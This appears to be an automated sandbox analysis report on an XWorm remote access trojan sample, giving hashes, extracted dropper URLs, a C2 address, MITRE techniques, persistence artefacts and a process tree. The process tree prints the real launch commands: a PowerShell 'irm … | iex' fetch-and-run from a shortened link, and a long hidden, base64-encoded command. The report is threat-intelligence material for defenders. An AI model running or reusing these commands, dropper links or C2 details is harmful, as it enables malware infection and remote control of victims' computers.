xworm | 7d83f37893fa8a17d42fe040878b30e1015286849931be05c60c908c3759d576

Analysis

max time kernel
140s
max time network
144s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
24-01-2025 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.txt
Size

261B
MD5

b7d1dea96fc88cf58391d928a3558e32
SHA1

c4a5be1b46c579c8405006c7da0b672181e90403
SHA256

7d83f37893fa8a17d42fe040878b30e1015286849931be05c60c908c3759d576
SHA512

08b08f2bf4f735c673f550c432badcf42e625e240971b78b8dc5d5c43f48076196aac44926882e4e0483f122a32c6633b6d57467e05ffe30fd5ee4190c351572

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/Discord.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/GoogleChrome.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/explorer.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/svchost.exe

Extracted

Family

xworm

147.185.221.24:35724

Attributes

Install_directory
%ProgramData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00280000000462ae-278.dat	family_xworm
behavioral1/memory/5572-288-0x00000000003D0000-0x00000000003E6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
28	2300	powershell.exe
30	2300	powershell.exe
58	4460	powershell.exe
62	4460	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5532	powershell.exe
5884	powershell.exe
6040	powershell.exe
5168	powershell.exe
5020	powershell.exe
4144	powershell.exe
2832	powershell.exe
5716	powershell.exe
2724	powershell.exe
3984	powershell.exe
3260	powershell.exe
4460	powershell.exe
2832	powershell.exe
6040	powershell.exe
5168	powershell.exe
5020	powershell.exe
4144	powershell.exe
1368	PowerShell.exe
2300	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2449540194-3226363261-2578591490-1000\Control Panel\International\Geo\Nation	Discord.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk	Discord.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk	Discord.exe

Executes dropped EXE 2 IoCs

pid	Process
5572	Discord.exe
4320	Discord

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2449540194-3226363261-2578591490-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord"	Discord.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
29	raw.githubusercontent.com
30	raw.githubusercontent.com
62	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
70	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\672c8585-44e1-4e64-b231-869e912decf0.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250124071255.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5640	schtasks.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
1368	PowerShell.exe
1368	PowerShell.exe
1368	PowerShell.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe
3984	powershell.exe
3984	powershell.exe
3984	powershell.exe
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe
4448	msedge.exe
4448	msedge.exe
2832	powershell.exe
2832	powershell.exe
4384	msedge.exe
4384	msedge.exe
2832	powershell.exe
6040	powershell.exe
6040	powershell.exe
6040	powershell.exe
5168	powershell.exe
5168	powershell.exe
5168	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
5160	identity_helper.exe
5160	identity_helper.exe
5532	powershell.exe
5532	powershell.exe
5532	powershell.exe
5716	powershell.exe
5716	powershell.exe
5716	powershell.exe
2724	powershell.exe
2724	powershell.exe
2724	powershell.exe
5884	powershell.exe
5884	powershell.exe
5884	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4384	msedge.exe
4384	msedge.exe
4384	msedge.exe
4384	msedge.exe
4384	msedge.exe
4384	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1368	PowerShell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeIncreaseQuotaPrivilege	2832	powershell.exe
Token: SeSecurityPrivilege	2832	powershell.exe
Token: SeTakeOwnershipPrivilege	2832	powershell.exe
Token: SeLoadDriverPrivilege	2832	powershell.exe
Token: SeSystemProfilePrivilege	2832	powershell.exe
Token: SeSystemtimePrivilege	2832	powershell.exe
Token: SeProfSingleProcessPrivilege	2832	powershell.exe
Token: SeIncBasePriorityPrivilege	2832	powershell.exe
Token: SeCreatePagefilePrivilege	2832	powershell.exe
Token: SeBackupPrivilege	2832	powershell.exe
Token: SeRestorePrivilege	2832	powershell.exe
Token: SeShutdownPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeSystemEnvironmentPrivilege	2832	powershell.exe
Token: SeRemoteShutdownPrivilege	2832	powershell.exe
Token: SeUndockPrivilege	2832	powershell.exe
Token: SeManageVolumePrivilege	2832	powershell.exe
Token: 33	2832	powershell.exe
Token: 34	2832	powershell.exe
Token: 35	2832	powershell.exe
Token: 36	2832	powershell.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeIncreaseQuotaPrivilege	6040	powershell.exe
Token: SeSecurityPrivilege	6040	powershell.exe
Token: SeTakeOwnershipPrivilege	6040	powershell.exe
Token: SeLoadDriverPrivilege	6040	powershell.exe
Token: SeSystemProfilePrivilege	6040	powershell.exe
Token: SeSystemtimePrivilege	6040	powershell.exe
Token: SeProfSingleProcessPrivilege	6040	powershell.exe
Token: SeIncBasePriorityPrivilege	6040	powershell.exe
Token: SeCreatePagefilePrivilege	6040	powershell.exe
Token: SeBackupPrivilege	6040	powershell.exe
Token: SeRestorePrivilege	6040	powershell.exe
Token: SeShutdownPrivilege	6040	powershell.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeSystemEnvironmentPrivilege	6040	powershell.exe
Token: SeRemoteShutdownPrivilege	6040	powershell.exe
Token: SeUndockPrivilege	6040	powershell.exe
Token: SeManageVolumePrivilege	6040	powershell.exe
Token: 33	6040	powershell.exe
Token: 34	6040	powershell.exe
Token: 35	6040	powershell.exe
Token: 36	6040	powershell.exe
Token: SeDebugPrivilege	5168	powershell.exe
Token: SeIncreaseQuotaPrivilege	5168	powershell.exe
Token: SeSecurityPrivilege	5168	powershell.exe
Token: SeTakeOwnershipPrivilege	5168	powershell.exe
Token: SeLoadDriverPrivilege	5168	powershell.exe
Token: SeSystemProfilePrivilege	5168	powershell.exe
Token: SeSystemtimePrivilege	5168	powershell.exe
Token: SeProfSingleProcessPrivilege	5168	powershell.exe
Token: SeIncBasePriorityPrivilege	5168	powershell.exe
Token: SeCreatePagefilePrivilege	5168	powershell.exe
Token: SeBackupPrivilege	5168	powershell.exe
Token: SeRestorePrivilege	5168	powershell.exe
Token: SeShutdownPrivilege	5168	powershell.exe
Token: SeDebugPrivilege	5168	powershell.exe
Token: SeSystemEnvironmentPrivilege	5168	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4384	msedge.exe
4384	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1368 wrote to memory of 2300	1368	PowerShell.exe	100
PID 1368 wrote to memory of 2300	1368	PowerShell.exe	100
PID 2300 wrote to memory of 4384	2300	powershell.exe	102
PID 2300 wrote to memory of 4384	2300	powershell.exe	102
PID 2300 wrote to memory of 3984	2300	powershell.exe	103
PID 2300 wrote to memory of 3984	2300	powershell.exe	103
PID 4384 wrote to memory of 2080	4384	msedge.exe	104
PID 4384 wrote to memory of 2080	4384	msedge.exe	104
PID 3984 wrote to memory of 3260	3984	powershell.exe	105
PID 3984 wrote to memory of 3260	3984	powershell.exe	105
PID 3260 wrote to memory of 4460	3260	powershell.exe	106
PID 3260 wrote to memory of 4460	3260	powershell.exe	106
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4492	4384	msedge.exe	107
PID 4384 wrote to memory of 4448	4384	msedge.exe	108
PID 4384 wrote to memory of 4448	4384	msedge.exe	108
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109
PID 4384 wrote to memory of 640	4384	msedge.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
1⤵
PID:4516

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -Command "Start-Process PowerShell -ArgumentList 'irm "https://tinyurl.com/4j72ashp/" | iex' -Verb RunAs"
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://tinyurl.com/4j72ashp/ | iex
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://as2.ftcdn.net/v2/jpg/00/53/69/65/1000_F_53696591_9LO1bsQUpl2zIolFMFokrQyt04Z5dzXd.jpg
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff831f146f8,0x7ff831f14708,0x7ff831f14718
      4⤵
      PID:2080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
      4⤵
      PID:4492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
      4⤵
      PID:640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
      4⤵
      PID:1668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
      4⤵
      PID:3068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
      4⤵
      PID:5660
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:5832
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x2ac,0x2b0,0x2b4,0x288,0x2b8,0x7ff7125c5460,0x7ff7125c5470,0x7ff7125c5480
        5⤵
        
        PID:5468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
      4⤵
      PID:5212
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
      4⤵
      PID:6028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
      4⤵
      PID:5684
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3840367497437046723,8068949214786804170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
      4⤵
      PID:6088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBUAGcAQgB2AEEARgBBAEEAYwBnAEIAdgBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAYgB3AEIAcwBBAEcAawBBAFkAdwBCADUAQQBDAEEAQQBRAGcAQgA1AEEASABBAEEAWQBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBGAGMAQQBhAFEAQgB1AEEARwBRAEEAYgB3AEIAMwBBAEYATQBBAGQAQQBCADUAQQBHAHcAQQBaAFEAQQBnAEEARQBnAEEAYQBRAEIAawBBAEcAUQBBAFoAUQBCAHUAQQBDAEEAQQBMAFEAQgBGAEEARwA0AEEAWQB3AEIAdgBBAEcAUQBBAFoAUQBCAGsAQQBFAE0AQQBiAHcAQgB0AEEARwAwAEEAWQBRAEIAdQBBAEcAUQBBAEkAQQBBAGkAQQBHAE0AQQBRAFEAQgBDAEEASABZAEEAUQBRAEIASQBBAEcATQBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgA1AEEARQBFAEEAUwBBAEIATgBBAEUARQBBAFkAUQBCAEIAQQBFAEkAQQBiAEEAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcASQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAVwBBAEgAYwBBAFEAZwBCAHcAQQBFAEUAQQBSAHcAQQAwAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGQAZwBCAEIAQQBFAGcAQQBZAHcAQgBCAEEARgBVAEEAZAB3AEIAQwBBAEQAQQBBAFEAUQBCAEkAQQBHAHMAQQBRAFEAQgBpAEEARQBFAEEAUQBnAEIAcwBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBVAHcAQgBCAEEARQBJAEEAYwBBAEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBGAG8AQQBRAFEAQgBDAEEARwB3AEEAUQBRAEIASABBAEQAUQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIATgBBAEUARQBBAFkAZwBCADMAQQBFAEkAQQBkAEEAQgBCAEEARQBjAEEATQBBAEIAQgBBAEYAawBBAFUAUQBCAEMAQQBIAFUAQQBRAFEAQgBIAEEARgBFAEEAUQBRAEIASgBBAEUARQBBAFEAUQBCAHAAQQBFAEUAQQBSAFEAQgBGAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGEAdwBCAEIAQQBFAE0AQQBNAEEAQgBCAEEARgBRAEEAVQBRAEIAQwBBAEgAYwBBAFEAUQBCAEcAQQBFAEUAQQBRAFEAQgBqAEEARwBjAEEAUQBnAEIAcwBBAEUARQBBAFIAdwBCAFoAQQBFAEUAQQBXAGcAQgBSAEEARQBJAEEAZQBRAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBHAEkAQQBaAHcAQgBDAEEARwBvAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIAVgBBAEUARQBBAFoAUQBCAEIAQQBFAEkAQQBhAGcAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcAUQBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBIAEEARwBzAEEAUQBRAEIAaQBBAEgAYwBBAFEAZwBCADEAQQBFAEUAQQBSAGcAQgBCAEEARQBFAEEAVwBRAEIAUgBBAEUASQBBAE0AQQBCAEIAQQBFAGMAQQBaAHcAQgBCAEEARQBrAEEAUQBRAEIAQgBBAEcANABBAFEAUQBCAEYAQQBFADAAQQBRAFEAQgBQAEEARwBjAEEAUQBnAEIAagBBAEUARQBBAFIAZwBCAEIAQQBFAEUAQQBZAHcAQgBuAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAFkAdwBCAEIAQQBHAE0AQQBaAHcAQgBDAEEARwBnAEEAUQBRAEIASABBAEQAQQBBAFEAUQBCAFMAQQBFAEUAQQBRAGcAQgBvAEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFcAUQBCAFIAQQBFAEUAQQBiAGcAQgBCAEEARQBNAEEAUwBRAEIAQgBBAEUATQBBAFoAdwBCAEMAQQBIAGMAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAawBBAEgAYwBBAFEAZwBCAHMAQQBFAEUAQQBTAEEAQgBKAEEARQBFAEEAWQB3AEIAMwBBAEUASQBBAGIAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARwBJAEEAUQBRAEIAQwBBAEgATQBBAFEAUQBCAEQAQQBFAEUAQQBRAFEAQgBNAEEARgBFAEEAUQBnAEIAWQBBAEUARQBBAFIAdwBCAHIAQQBFAEUAQQBZAGcAQgBuAEEARQBJAEEAYQB3AEIAQgBBAEUAYwBBAE8AQQBCAEIAQQBHAFEAQQBkAHcAQgBDAEEARgBRAEEAUQBRAEIASQBBAEYARQBBAFEAUQBCAGwAQQBGAEUAQQBRAGcAQgB6AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFMAUQBCAEIAQQBFAEkAQQBTAFEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEYAbwBBAFEAUQBCAEMAQQBHAHMAQQBRAFEAQgBIAEEARgBVAEEAUQBRAEIAaQBBAEcAYwBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQQB3AEEARQBFAEEAVQBRAEIAMwBBAEUASQBBAGQAZwBCAEIAQQBFAGMAQQBNAEEAQgBCAEEARwBJAEEAVQBRAEIAQwBBAEcAZwBBAFEAUQBCAEgAQQBEAFEAQQBRAFEAQgBhAEEARQBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAEoAQQBFAEUAQQBVAFEAQgBSAEEARQBJAEEAYQB3AEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBFAHcAQQBVAFEAQgBDAEEARQA0AEEAUQBRAEIASQBBAEUARQBBAFEAUQBCAFYAQQBFAEUAQQBRAGcAQgA1AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFcAZwBCAG4AQQBFAEkAQQBiAEEAQgBCAEEARQBnAEEAUwBRAEIAQgBBAEYAbwBBAFUAUQBCAEMAQQBIAFUAQQBRAFEAQgBIAEEARQAwAEEAUQBRAEIAYQBBAEYARQBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQQB3AEEARQBFAEEAVQBnAEIAUgBBAEUASQBBAE4AQQBCAEIAQQBFAGMAQQBUAFEAQgBCAE